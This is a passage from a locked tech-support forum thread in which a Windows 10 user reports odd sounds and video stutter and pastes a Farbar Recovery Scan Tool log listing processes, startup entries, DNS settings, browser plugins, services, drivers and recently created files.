
Infected Windows 10


  • This topic is locked
7 replies to this topic

#1 Kevin07


Posted 08 March 2016 - 11:18 PM

Hi,

Hope you're well.

Recently I have been having issues with my desktop, including unintentional sounds playing and unstable stutters of videos played. I have attached a few logs.

Kind regards,

Kevin

Here are my logs:


Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by kevin (administrator) on DESKTOP-USOP2KE (09-03-2016 15:05:47)
Running from C:\
Loaded Profiles: kevin (Available Profiles: kevin)
Platform: Windows 10 Pro Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avguard.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
() C:\Windows\System32\PnkBstrA.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avshadow.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation) C:\Users\kevin\AppData\Local\NVIDIA\NvBackend\ApplicationOntology\NvOAWrapperCache.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(BitTorrent Inc.) C:\Users\kevin\AppData\Roaming\uTorrent\uTorrent.exe
(Electronic Arts) C:\Program Files (x86)\Origin\Origin.exe
(BitTorrent Inc.) C:\Users\kevin\AppData\Roaming\uTorrent\updates\3.4.5_41865\utorrentie.exe
(BitTorrent Inc.) C:\Users\kevin\AppData\Roaming\uTorrent\updates\3.4.5_41865\utorrentie.exe
(Spotify Ltd) C:\Users\kevin\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avgnt.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2789248 2016-03-03] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [14040792 2015-07-15] (Realtek Semiconductor)
HKLM-x32\...\Run: [Avira SystrayStartTrigger] => C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe [66328 2016-01-27] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\Antivirus\avgnt.exe [804168 2016-02-17] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [4513792 2014-05-22] (Brother Industries, Ltd.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\Run: [uTorrent] => C:\Users\kevin\AppData\Roaming\uTorrent\uTorrent.exe [2094080 2016-03-06] (BitTorrent Inc.)
HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3639280 2016-02-02] (Electronic Arts)
HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\Run: [Spotify] => C:\Users\kevin\AppData\Roaming\Spotify\Spotify.exe [6754928 2016-03-06] (Spotify Ltd)
HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\Run: [Spotify Web Helper] => C:\Users\kevin\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1524848 2016-03-06] (Spotify Ltd)
HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8590760 2015-12-09] (Piriform Ltd)
BootExecute: autocheck autochk /k:C /k:F /k:D /k:E /k:G /k:H * 
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 211.29.132.12 198.142.0.51 198.142.235.14
Tcpip\Parameters: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{346a6b6a-5c99-47ff-8be1-c3b920aae974}: [DhcpNameServer] 211.29.132.12 198.142.0.51 198.142.235.14
Tcpip\..\Interfaces\{ed6fdde8-dd53-47a8-b0fc-23136ccb7468}: [DhcpNameServer] 198.18.0.1 198.18.0.2
 
Internet Explorer:
==================
HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/p/?LinkId=619797&pc=UE03&ocid=UE03DHP
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-03-02] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-02-05] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2016-03-02] (Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2016-02-05] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-02-05] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-02-05] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-02-05] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-02-05] (Microsoft Corporation)
 
FireFox:
========
FF ProfilePath: C:\Users\kevin\AppData\Roaming\Mozilla\Firefox\Profiles\4nj0h1bc.default
FF NewTab: about:home
FF DefaultSearchEngine: Google
FF SelectedSearchEngine: Google
FF Homepage: about:home
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-27] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-27] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1222172.dll [2015-11-19] (Adobe Systems, Inc.)
FF Plugin-x32: @esn/esnlaunch,version=2.3.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.3.0\npesnlaunch.dll [2013-09-16] (ESN Social Software AB)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-03-02] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-02-05] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-03-03] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-03-03] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF SearchPlugin: C:\Users\kevin\AppData\Roaming\Mozilla\Firefox\Profiles\4nj0h1bc.default\searchplugins\google-lavasoft.xml [2016-02-23]
FF Extension: Avira Browser Safety - C:\Users\kevin\AppData\Roaming\Mozilla\Firefox\Profiles\4nj0h1bc.default\Extensions\abs@avira.com.xpi [2016-02-24]
FF Extension: Video AdBlock for Firefox - C:\Users\kevin\AppData\Roaming\Mozilla\Firefox\Profiles\4nj0h1bc.default\Extensions\{a00bef25-f21a-4539-adbb-b179b29e2b92} [2016-01-10] [not signed]
 
Chrome: 
=======
CHR Plugin: (Widevine Content Decryption Module) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\WidevineCDM\1.4.8.866\_platform_specific\win_x86\widevinecdmadapter.dll (Google Inc.)
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\PepperFlash\pepflashplayer.dll ()
CHR Profile: C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-01-10]
CHR Extension: (Google Docs) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-10]
CHR Extension: (Google Drive) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-10]
CHR Extension: (Video AdBlock for Chrome) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\bknbnapaddjdnbilpmlacdkjdkjmbjhd [2016-01-10]
CHR Extension: (YouTube) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-10]
CHR Extension: (Google Search) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-10]
CHR Extension: (Google Sheets) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-01-10]
CHR Extension: (Avira Browser Safety) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2016-02-24]
CHR Extension: (Google Docs Offline) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-01-10]
CHR Extension: (Chrome Web Store Payments) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-01-10]
CHR Extension: (Gmail) - C:\Users\kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-10]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 AntiVirMailService; C:\Program Files (x86)\Avira\Antivirus\avmailc7.exe [948392 2016-02-17] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\Antivirus\sched.exe [466408 2016-02-17] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\Antivirus\avguard.exe [466408 2016-02-17] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\Antivirus\avwebg7.exe [1417592 2016-02-17] (Avira Operations GmbH & Co. KG)
S4 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [260456 2016-01-27] (Avira Operations GmbH & Co. KG)
R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [282112 2013-09-25] (Brother Industries, Ltd.) [File not signed]
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2804976 2016-02-04] (Microsoft Corporation)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1164672 2016-03-03] (NVIDIA Corporation)
S4 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel® Corporation)
S4 Intel® Security Assist; C:\Program Files (x86)\Intel\Intel® Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [File not signed]
S4 isaHelperSvc; C:\Program Files (x86)\Intel\Intel® Security Assist\isaHelperService.exe [7680 2015-05-19] () [File not signed]
S4 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [223008 2015-07-06] (Intel Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1880960 2016-03-03] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [6474112 2016-03-03] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2609024 2016-03-03] (NVIDIA Corporation)
S4 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2104840 2016-02-02] (Electronic Arts)
R2 PnkBstrA; C:\Windows\system32\PnkBstrA.exe [76152 2016-01-01] ()
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2015-12-30] ()
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S0 Avgboota; C:\Windows\System32\DRIVERS\avgboota.sys [21632 2016-01-07] (AVG Technologies CZ, s.r.o.)
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [184240 2015-11-06] (AVG Technologies CZ, s.r.o.)
R1 Avgfwfd; C:\Windows\system32\DRIVERS\avgfwd6a.sys [97208 2015-08-29] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [272304 2016-01-08] (AVG Technologies CZ, s.r.o.)
S1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [284080 2015-10-21] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [398256 2015-08-14] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [260528 2016-01-22] (AVG Technologies CZ, s.r.o.)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [135880 2016-02-17] (Avira Operations GmbH & Co. KG)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [42416 2015-12-04] (AVG Technologies CZ, s.r.o.)
R0 Avguniva; C:\Windows\System32\DRIVERS\avguniva.sys [23472 2016-01-08] (AVG Technologies CZ, s.r.o.)
R1 Avgwfpa; C:\Windows\system32\DRIVERS\avgwfpa.sys [315840 2015-12-16] (AVG Technologies CZ, s.r.o.)
R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [146704 2016-02-17] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [35488 2016-02-17] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [73032 2016-02-17] (Avira Operations GmbH & Co. KG)
S3 dtlitescsibus; C:\Windows\System32\drivers\dtlitescsibus.sys [30264 2016-02-17] (Disc Soft Ltd)
S3 dtliteusbbus; C:\Windows\System32\drivers\dtliteusbbus.sys [47672 2016-02-17] (Disc Soft Ltd)
R3 ISCT; C:\Windows\System32\drivers\ISCTD64.sys [47008 2013-07-30] ()
S3 mbamchameleon; C:\Windows\system32\drivers\mbamchameleon.sys [109272 2016-03-09] (Malwarebytes)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [184096 2015-06-29] (Intel Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [28032 2016-03-03] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [47760 2016-03-03] (NVIDIA Corporation)
R3 SaiK0CCC; C:\Windows\system32\DRIVERS\SaiK0CCC.sys [171016 2010-04-29] (Saitek)
R3 SaiU0CCC; C:\Windows\System32\drivers\SaiU0CCC.sys [41096 2010-04-29] (Saitek)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
S3 cpuz138; \??\C:\Users\kevin\AppData\Local\Temp\cpuz138\cpuz138_x64.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-03-09 15:05 - 2016-03-09 15:05 - 00019407 _____ C:\FRST.txt
2016-03-09 14:55 - 2016-03-09 15:05 - 00000000 ____D C:\FRST
2016-03-09 14:54 - 2016-03-09 14:55 - 02374144 _____ (Farbar) C:\FRST64.exe
2016-03-09 14:46 - 2016-03-09 14:46 - 00000554 _____ C:\Users\kevin\Desktop\JRT.txt
2016-03-09 14:45 - 2016-03-09 14:45 - 01609216 _____ (Malwarebytes) C:\Users\kevin\Downloads\JRT (1).exe
2016-03-09 14:44 - 2016-03-09 14:45 - 01609216 _____ (Malwarebytes) C:\Users\kevin\Downloads\JRT.exe
2016-03-09 14:34 - 2016-03-09 15:03 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2016-03-09 14:34 - 2016-03-09 14:49 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-03-09 14:34 - 2016-03-09 14:34 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-09 14:33 - 2016-03-09 15:00 - 00000000 ____D C:\Users\kevin\Desktop\mbar
2016-03-09 14:33 - 2016-03-09 14:33 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-03-09 14:32 - 2016-03-09 14:33 - 16563352 _____ (Malwarebytes Corp.) C:\Users\kevin\Downloads\mbar-1.09.3.1001.exe
2016-03-09 12:19 - 2016-03-09 12:19 - 00000000 ____D C:\Program Files\hijackthis
2016-03-09 12:18 - 2016-03-09 12:18 - 00388608 _____ (Trend Micro Inc.) C:\Users\kevin\Downloads\HijackThis (1).exe
2016-03-09 12:15 - 2016-03-09 12:15 - 00000000 ____D C:\Users\kevin\AppData\Local\ElevatedDiagnostics
2016-03-09 11:53 - 2016-03-01 16:31 - 00848168 _____ (Microsoft Corporation) C:\Windows\system32\mfsvr.dll
2016-03-09 11:53 - 2016-03-01 16:22 - 00709688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsvr.dll
2016-03-09 11:53 - 2016-02-24 20:52 - 01997328 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-03-09 11:53 - 2016-02-24 20:51 - 07474528 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-03-09 11:53 - 2016-02-24 20:48 - 00713568 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-03-09 11:53 - 2016-02-24 20:47 - 01173344 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-03-09 11:53 - 2016-02-24 20:40 - 00513888 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-03-09 11:53 - 2016-02-24 20:34 - 01613664 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2016-03-09 11:53 - 2016-02-24 20:28 - 03449168 _____ (Microsoft Corporation) C:\Windows\system32\WSService.dll
2016-03-09 11:53 - 2016-02-24 20:15 - 01557768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-03-09 11:53 - 2016-02-24 19:58 - 00794888 _____ (Microsoft Corporation) C:\Windows\system32\mfds.dll
2016-03-09 11:53 - 2016-02-24 19:54 - 00127840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBSTOR.SYS
2016-03-09 11:53 - 2016-02-24 19:51 - 01322248 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2016-03-09 11:53 - 2016-02-24 19:50 - 00808800 _____ (Microsoft Corporation) C:\Windows\system32\WWAHost.exe
2016-03-09 11:53 - 2016-02-24 19:46 - 06607080 _____ (Microsoft Corporation) C:\Windows\system32\windows.storage.dll
2016-03-09 11:53 - 2016-02-24 19:43 - 00625000 _____ (Microsoft Corporation) C:\Windows\system32\ClipSVC.dll
2016-03-09 11:53 - 2016-02-24 19:39 - 00358752 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-03-09 11:53 - 2016-02-24 19:39 - 00141560 _____ (Microsoft Corporation) C:\Windows\system32\AuthHost.exe
2016-03-09 11:53 - 2016-02-24 19:19 - 00670928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfds.dll
2016-03-09 11:53 - 2016-02-24 19:14 - 00216416 _____ (Microsoft Corporation) C:\Windows\system32\AppxAllUserStore.dll
2016-03-09 11:53 - 2016-02-24 19:11 - 01997152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2016-03-09 11:53 - 2016-02-24 19:11 - 00957608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2016-03-09 11:53 - 2016-02-24 19:11 - 00703840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WWAHost.exe
2016-03-09 11:53 - 2016-02-24 19:11 - 00652392 _____ (Microsoft Corporation) C:\Windows\system32\dxgi.dll
2016-03-09 11:53 - 2016-02-24 19:11 - 00394080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2016-03-09 11:53 - 2016-02-24 19:11 - 00258280 _____ (Microsoft Corporation) C:\Windows\system32\sqmapi.dll
2016-03-09 11:53 - 2016-02-24 19:10 - 00630632 _____ (Microsoft Corporation) C:\Windows\system32\fontdrvhost.exe
2016-03-09 11:53 - 2016-02-24 19:10 - 00576864 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms2.sys
2016-03-09 11:53 - 2016-02-24 19:09 - 00640472 _____ (Microsoft Corporation) C:\Windows\system32\wer.dll
2016-03-09 11:53 - 2016-02-24 19:09 - 00147808 _____ (Microsoft Corporation) C:\Windows\system32\wermgr.exe
2016-03-09 11:53 - 2016-02-24 19:06 - 05242496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windows.storage.dll
2016-03-09 11:53 - 2016-02-24 18:59 - 00294752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-03-09 11:53 - 2016-02-24 18:38 - 00187744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxAllUserStore.dll
2016-03-09 11:53 - 2016-02-24 18:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\PimIndexMaintenanceClient.dll
2016-03-09 11:53 - 2016-02-24 18:35 - 00540752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontdrvhost.exe
2016-03-09 11:53 - 2016-02-24 18:35 - 00523752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxgi.dll
2016-03-09 11:53 - 2016-02-24 18:35 - 00220064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sqmapi.dll
2016-03-09 11:53 - 2016-02-24 18:33 - 00538736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wer.dll
2016-03-09 11:53 - 2016-02-24 18:33 - 00141664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wermgr.exe
2016-03-09 11:53 - 2016-02-24 18:23 - 00091648 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2016-03-09 11:53 - 2016-02-24 18:23 - 00068096 _____ (Microsoft Corporation) C:\Windows\system32\UserDataPlatformHelperUtil.dll
2016-03-09 11:53 - 2016-02-24 18:20 - 00195072 _____ (Microsoft Corporation) C:\Windows\system32\VCardParser.dll
2016-03-09 11:53 - 2016-02-24 18:20 - 00167936 _____ (Microsoft Corporation) C:\Windows\system32\dafBth.dll
2016-03-09 11:53 - 2016-02-24 18:20 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\AppxSysprep.dll
2016-03-09 11:53 - 2016-02-24 18:19 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\dssvc.dll
2016-03-09 11:53 - 2016-02-24 18:15 - 00365568 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2016-03-09 11:53 - 2016-02-24 18:14 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\ExSMime.dll
2016-03-09 11:53 - 2016-02-24 18:13 - 00121856 _____ (Microsoft Corporation) C:\Windows\system32\AppointmentActivation.dll
2016-03-09 11:53 - 2016-02-24 18:12 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\cemapi.dll
